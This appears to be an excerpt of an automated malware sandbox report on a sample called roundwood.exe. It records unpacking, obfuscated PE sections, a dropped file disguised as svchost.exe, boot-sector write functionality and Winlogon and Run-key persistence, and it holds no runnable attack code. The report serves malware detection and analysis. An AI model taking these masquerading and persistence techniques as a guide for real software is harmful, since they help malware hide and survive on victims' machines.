Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: dbgcore.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: winnsi.dll

Source: C:\Users\user\Desktop\roundwood.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32

Jump to behavior

Source: roundwood.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\roundwood.exe	Unpacked PE file: 0.2.roundwood.exe.400000.0.unpack .sX:R;.RqVY:R;.i:ER;.lziQh:R;.EXGwv:W;.data:W;.I:R;.E:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 2.2.svchost.exe.400000.0.unpack .sX:R;.RqVY:R;.i:ER;.lziQh:R;.EXGwv:W;.data:W;.I:R;.E:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.unpack
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.unpack
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.unpack
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\roundwood.exe	Unpacked PE file: 0.2.roundwood.exe.400000.0.unpack
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 2.2.svchost.exe.400000.0.unpack

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_004020C0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_004020C0

Source: initial sample

Static PE information: section where entry point is pointing to: .i

Source: roundwood.exe	Static PE information: real checksum: 0x47cbf47f should be: 0x3bb4e
Source: svchost.exe.0.dr	Static PE information: real checksum: 0x2b2e39e0 should be: 0x3bb4e

Source: roundwood.exe	Static PE information: section name: .sX
Source: roundwood.exe	Static PE information: section name: .RqVY
Source: roundwood.exe	Static PE information: section name: .i
Source: roundwood.exe	Static PE information: section name: .lziQh
Source: roundwood.exe	Static PE information: section name: .EXGwv
Source: roundwood.exe	Static PE information: section name: .I
Source: roundwood.exe	Static PE information: section name: .E
Source: svchost.exe.0.dr	Static PE information: section name: .sX
Source: svchost.exe.0.dr	Static PE information: section name: .RqVY
Source: svchost.exe.0.dr	Static PE information: section name: .i
Source: svchost.exe.0.dr	Static PE information: section name: .lziQh
Source: svchost.exe.0.dr	Static PE information: section name: .EXGwv
Source: svchost.exe.0.dr	Static PE information: section name: .I
Source: svchost.exe.0.dr	Static PE information: section name: .E

Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044E8E3 push cs; ret	0_2_0044E8F8
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044E919 push cs; iretd	0_2_0044E928
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044E24D push es; iretd	0_2_0044E25C
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044B207 push cs; retf 0004h	0_2_0044B301
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044AD50 push eax; ret	0_2_0044AD7E
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044AE42 push eax; retf	0_2_0044AE69
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044AF4C pushad ; retn 0004h	0_2_0044AF55
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044AF22 push ds; ret	0_2_0044AF29
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044E8E3 push cs; ret	2_2_0044E8F8
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044E919 push cs; iretd	2_2_0044E928
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044E24D push es; iretd	2_2_0044E25C
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044B207 push cs; retf 0004h	2_2_0044B301
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044AD50 push eax; ret	2_2_0044AD7E
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044AE42 push eax; retf	2_2_0044AE69
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044AF4C pushad ; retn 0004h	2_2_0044AF55
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044AF22 push ds; ret	2_2_0044AF29
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D48AE3 push cs; ret	2_2_02D48AF8
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D48B19 push cs; iretd	2_2_02D48B28
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D44950 push eax; ret	2_2_02D4497E
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D4844D push es; iretd	2_2_02D4845C
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02906207 push cs; retf 0004h	2_2_02906301
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0290924D push es; iretd	2_2_0290925C
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028EC8AC push ebp; retf	2_2_028EC8AD
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029098E3 push cs; ret	2_2_029098F8
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F61BC push ebp; retf	2_2_028F61BD
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02909919 push cs; iretd	2_2_02909928
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02905E42 push eax; retf	2_2_02905E69
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02905F22 push ds; ret	2_2_02905F29
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02905F4C pushad ; retn 0004h	2_2_02905F55
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F6442 push ebp; retf	2_2_028F6443
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02905D50 push eax; ret	2_2_02905D7E

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	2_2_02D13000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	4_2_012F3000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	5_2_00E43000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	8_2_00E83000

Drops PE files with benign system names

Source: C:\Users\user\Desktop\roundwood.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\roundwood.exe

Executable created and started: C:\Windows\apppatch\svchost.exe

Jump to behavior

Source: C:\Users\user\Desktop\roundwood.exe

Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\

0_2_004033B0

Source: C:\Users\user\Desktop\roundwood.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\roundwood.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	2_2_02D13000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	4_2_012F3000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	5_2_00E43000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	8_2_00E83000

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinit

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Windows\apppatch\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit

Jump to behavior

Monitors registry run keys for changes

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
